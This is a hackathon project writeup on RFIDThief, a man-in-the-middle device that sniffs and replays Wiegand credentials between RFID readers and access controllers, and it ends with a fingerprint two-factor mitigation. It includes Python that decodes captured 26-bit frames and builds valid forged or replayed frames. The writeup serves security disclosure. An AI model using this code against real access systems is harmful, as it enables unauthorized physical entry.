This writeup is a work in progress. I will be updating it with more details in the coming months.
Overview
RFIDThief is a man-in-the-middle attack device designed to expose vulnerabilities in widely used RFID access control systems. Built during the 36-hour HackUMass X hackathon in November 2022, the device demonstrates critical security flaws in the Wiegand protocol, the reader-to-controller wiring standard used in most RFID access control systems. Wiegand has long been documented as insecure, and for installations with particularly high security requirements vendors recommend newer protocols such as OSDP, whose Secure Channel mode adds encryption and authentication on the same wiring.
The project was developed in collaboration with John Dale and won first place at HackUMass X in 2022.
The Vulnerability
The Wiegand protocol, despite its widespread adoption, has a fundamental security flaw: the card data is transmitted in plaintext between the RFID reader and the access control panel, as a stream of pulses on two wires (D0 for a 0 bit, D1 for a 1 bit). There is no encryption, no authentication of the reader, and no integrity checking beyond the parity bits of the card format itself.
This means anyone with physical access to the wiring between a reader and its controller (typically reachable behind the reader housing, on the unsecured side of the door) can:
- Sniff credentials as users scan their cards
- Replay captured credentials to gain unauthorized access
- Inject forged credentials: the controller accepts any correctly formatted frame as if the reader had produced it
- Deny service by flooding the controller with invalid data
How It Works
RFIDThief sits between the RFID reader and the access control panel, intercepting all Wiegand communications. The device samples the D0 and D1 lines directly on GPIO pins (bit-banging) and decodes the protocol in real time.
When a legitimate user scans their RFID card:
- The reader extracts the card's ID and clocks it out over the D0/D1 lines
- RFIDThief intercepts the Wiegand signal before it reaches the controller
- The credential is logged and can be replayed later
- The original ID is forwarded to the controller so the door opens normally and the user notices nothing (forwarding can be turned off)
The attacker can then replay the captured credential at any time to gain access without possessing the original card.
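The following is an added example, not the RFIDThief firmware, that models in Python what the device does on the wires for both the sniff and the replay steps above. A Wiegand read is treated as a list of timestamped pulses on D0 or D1; sniffing groups those pulses into frames and checks their parity, and replay turns a stored frame back into a pulse train. The timing constants, the 26-bit H10301 card layout (even parity, 8-bit facility code, 16-bit card number, odd parity), and every function name here are assumptions of the example; the page does not say which card format the target readers used.

```python
# Added example (not RFIDThief's firmware): a software model of sniffing and
# replaying Wiegand. Each bit is a brief low pulse on one of two lines, D0 for 0
# and D1 for 1, so sniffing is timestamping pulses and replay is driving the same
# pulses back out. Timing constants and the 26-bit H10301 layout are assumptions.
from dataclasses import dataclass

PULSE_PERIOD_US = 1000   # assumed spacing between bit pulses
FRAME_GAP_US = 25000     # assumed idle time that separates two card reads


@dataclass
class Credential:
    facility_code: int
    card_number: int
    raw_bits: str


def pulses_to_frames(events):
    """Group timestamped pulses (t_us, 'D0'|'D1') into one bit string per card read."""
    frames, current, last_t = [], [], None
    for t_us, line in events:
        if current and last_t is not None and t_us - last_t > FRAME_GAP_US:
            frames.append("".join(current))
            current = []
        current.append("1" if line == "D1" else "0")
        last_t = t_us
    if current:
        frames.append("".join(current))
    return frames


def parity(bits):
    return bits.count("1") % 2


def decode_26bit(bits):
    """Parse a 26-bit H10301 frame: E FFFFFFFF CCCCCCCCCCCCCCCC O.

    Bit 0 is even parity over bits 0-12, bit 25 is odd parity over bits 13-25.
    A frame that fails parity (noise, a half-captured read) is rejected so the
    device never stores or replays garbage.
    """
    if len(bits) != 26:
        raise ValueError(f"expected 26 bits, got {len(bits)}")
    if parity(bits[0:13]) != 0:
        raise ValueError("even parity check failed")
    if parity(bits[13:26]) != 1:
        raise ValueError("odd parity check failed")
    return Credential(int(bits[1:9], 2), int(bits[9:25], 2), bits)


def encode_26bit(facility_code, card_number):
    """Build a valid 26-bit frame, exactly what a replay or injection sends."""
    body = format(facility_code, "08b") + format(card_number, "016b")
    even = str(parity(body[0:12]))       # makes bits 0-12 even
    odd = str(1 - parity(body[12:24]))   # makes bits 13-25 odd
    return even + body + odd


def frame_to_pulses(bits, start_us=0):
    """Turn a frame back into the pulse train the controller expects."""
    return [(start_us + i * PULSE_PERIOD_US, "D1" if b == "1" else "D0")
            for i, b in enumerate(bits)]


def sniff_and_replay(events):
    """Model the whole attack: sniff every frame, keep the valid ones, replay them."""
    captured = []
    for frame in pulses_to_frames(events):
        try:
            captured.append(decode_26bit(frame))
        except ValueError:
            continue  # noise or a truncated read: drop it rather than replay it
    replay = [frame_to_pulses(c.raw_bits) for c in captured]
    return captured, replay


# Constructed sample capture: two legitimate reads, then a truncated burst of noise.
SAMPLE_EVENTS = (
    frame_to_pulses(encode_26bit(12, 3456), start_us=0)
    + frame_to_pulses(encode_26bit(200, 65535), start_us=100_000)
    + [(200_000 + i * PULSE_PERIOD_US, "D0") for i in range(5)]
)

if __name__ == "__main__":
    creds, replay = sniff_and_replay(SAMPLE_EVENTS)
    for c in creds:
        print(f"facility={c.facility_code} card={c.card_number} bits={c.raw_bits}")
```

Note that the parity check is the only integrity mechanism the frame carries, and it is computed over the plaintext bits, so an attacker who can forge a frame can trivially forge its parity too; it protects against line noise, not against injection.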
Features
- Credential Sniffing: Capture RFID card data in real-time
- Replay Attacks: Store and replay captured credentials on demand
- Denial of Service: Flood the controller to disable the access system
- Cloud Integration: Send captured data to a remote server for analysis
- Graphical User Interface: Display captured RFID IDs in real-time
- Configurable Modes: Toggle between passive sniffing and active attack modes
Two-Factor Mitigation
To demonstrate how these vulnerabilities can be mitigated, we implemented a two-factor authentication system using a fingerprint reader. The fingerprint sensor operates on a completely separate circuit and sends its verification result to the cloud independently of the RFID system.
This physical separation means that even if an attacker compromises the Wiegand connection, they cannot bypass the biometric verification: both factors must authenticate through independent channels, and the unlock decision is made only where the two results meet, not at the Wiegand controller alone.
Recognition
- 1st Place at HackUMass X (November 2022)
- $500 Grant from the Berthiaume Center for Entrepreneurship for further development
- Featured in UMass Engineering News
- Featured in UMass CICS News
